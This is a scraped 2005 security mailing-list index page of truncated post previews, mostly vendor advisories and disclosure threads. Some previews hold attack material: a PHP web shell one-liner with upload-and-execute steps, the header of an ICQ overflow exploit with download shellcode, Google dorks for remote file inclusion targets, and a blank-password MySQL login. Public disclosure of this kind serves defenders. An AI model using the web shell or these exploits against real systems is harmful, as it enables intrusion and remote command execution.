|
|
Colapse all |
Post message
Advisory 19/2005: PHP register_globals Activation Vulnerability in parse_str() 2005-10-31 Stefan Esser (sesser hardened-php net) Advisory 20/2005: PHP File-Upload $GLOBALS Overwrite Vulnerability 2005-10-31 Stefan Esser (sesser hardened-php net) New List 2005-10-31 David Ahmad (da securityfocus com) Objective The primary objective of the Beta-Announce list is to provide the SecurityFocus community access to upcoming security tool and product beta trials. In the same vein it will provide access to tool authors and vendors to announce their beta programs and get valuable feedback from the commun [ more ] [ reply ] [USN-213-1] sudo vulnerability 2005-10-28 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-213-1 October 28, 2005 sudo vulnerability CVE-2005-2959 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5 [ more ] [ reply ] [USN-151-3] zlib vulnerabilities 2005-10-28 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-151-3 October 28, 2005 aide vulnerabilities CVE-2005-1849, CVE-2005-2096 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty [ more ] [ reply ] [USN-206-2] Fixed lynx packages for USN-206-1 2005-10-29 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-206-2 October 29, 2005 lynx regression fix =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary He [ more ] [ reply ] [USN-212-1] libgda2 vulnerability 2005-10-28 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-212-1 October 28, 2005 libgda2 vulnerability CAN-2005-2958 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubunt [ more ] [ reply ] Trend Micro's Response to the Magic Byte Bug 2005-10-29 Auri Rahimzadeh (auri auri net) I forwarded the Magic Byte message thread to Trend Micro and this was their response... they want me and my clients to upgrade to their latest version in order to get realistic protection... Anyone from Trend Micro listening? -----Original Message----- From: retail (at) support.trendmicro (dot) com [email concealed] [mailto:r [ more ] [ reply ] uplod phpshell in PHP Advanced Transfer Manager 2005-10-29 sQl hotmail com < uplod phpshell in PHP Advanced Transfer Manager one save as the code : -------- <pre> <? passthru($_GET['sQl']); ?> -------- file > save as > sQl.php.ns now upload in the PHP Advanced Transfer Manager end the upload go to > www.site.com/[file upload name]/[files]/sQl.php.ns?sQl=[command [ more ] [ reply ] Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit 2005-10-29 atmaca icqmail com /* * * Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit * Bug discovered & exploit coded by ATmaCA * Web: http://www.spyinstructors.com && http://www.atmacasoft.com * E-Mail: atmaca (at) icqmail (dot) com [email concealed] * Credit to Kozan and delicon * */ /* * Usage: * * Execute exploit, it will create "bof. [ more ] [ reply ] Vulnerability in MG2 php based Image Gallery - bypass security, view password protected images 2005-10-28 preben watchcom no The MG2 Image Gallery system has the ability to make create online galleries. Even password protected once. By manipulating url from a gallery, you are able to list out all pictures in every gallery. Even though they are inside a password protected folder. Sample manipulation could be: www.yoursit [ more ] [ reply ] Re: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems aswell) Cookie disclosure exploit. 2005-10-27 Nicob (nicob nicob net) Le jeudi 27 octobre 2005 à 08:54 -0500, Tatercrispies a écrit : > And I really don't see how this could ever be used to execute > server-side script unless for some bizarre reason you had your > webserver so completely misconfigured as to be beyond imagination. Why > would you be parsing image file [ more ] [ reply ] Re: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit. 2005-10-27 Tatercrispies (tatercrispies gmail com) On 10/27/05, Nicob <nicob (at) nicob (dot) net [email concealed]> wrote: > Le mardi 25 octobre 2005 à 17:02 -0400, Paul Laudanski a écrit : > > > > Anyone have other ideas on this? I've already implemented some code > > to validate file input and its working. But is this the right > > approach? > > I'm not sure to understand [ more ] [ reply ] Re: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability through forged magic byte 2005-10-27 Williams, James K (James Williams ca com) > Subject: Re: Multiple Vendor Anti-Virus Software Detection > Evasion Vulnerability through forged magic byte > From: "Andrey Bayora" <andrey () securityelf ! org> > Date: 2005-10-25 3:07:51 > > [...] > > VULNERABLE vendors and software (tested): > > [...] > > 3. eTrust CA (ver 7.0.1.4, engine 1 [ more ] [ reply ] Re: phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit. 2005-10-25 Paul Laudanski (zx castlecops com) On Tue, 25 Oct 2005, Tatercrispies wrote: > On 10/25/05, Paul Laudanski <zx (at) castlecops (dot) com [email concealed]> wrote: > > > > > > Anyone have other ideas on this? I've already implemented some code to > > validate file input and its working. But is this the right approach? > > > > Since it is an IE issue, you may as [ more ] [ reply ] Remote MySQL User on Cpanel Default installation with blank password 2005-10-25 sup3r_linux hotmail com root@host [~]# mysql -uhorde -p -h example.com pelese enter blank password Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 922208 to server version: 4.0.22-standard Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show datab [ more ] [ reply ] Re: Remote File Inclusion in forum PunBB 2005-10-29 arpen securityfocus com, home securityfocus com,se securityfocus com 1. The bug is over a year old (see bid 10760). 2. The bug was fixed in 1.1.5, so that version is not vulnerable. 3. It was discovered by Radek Hulan, not "RoDheDoR". 4. The exploit detailed is copied directly from the old bid so "RoDheDoR" was obviously aware of it. The nerve of some of these repor [ more ] [ reply ] Re: [Full-disclosure] Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte 2005-10-27 Andrey Bayora (andrey securityelf org) I checked the "ZM" variant and got the same results as for "MZ" one. Thus, I think that they indeed, detected as executables, but only AV vendor can tell for sure. Generally, there are many variants for this issue, as many various "magic byte" variants exist. In my case - I force AV to look at the T [ more ] [ reply ] Remote File Inclusion in vCard :) 2005-10-25 X securityfocus com, "[AT]" securityfocus com,Hotmail securityfocus com, "[D0T] CoM" securityfocus com Remote File Inclusion in :- -------------------------- vCard Date :- ------ 26/10/2005 version :- --------- 2.9 The bug reside in :- ------------------- define.inc.php And error in :- -------------- online.inc.php search google :- --------------- powered by vCard 2.9 & allinurl:vCa [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: PHP register_globals Activation Vulnerability in parse_str()
Release Date: 2005/10/31
Last Modif
[ more ] [ reply ]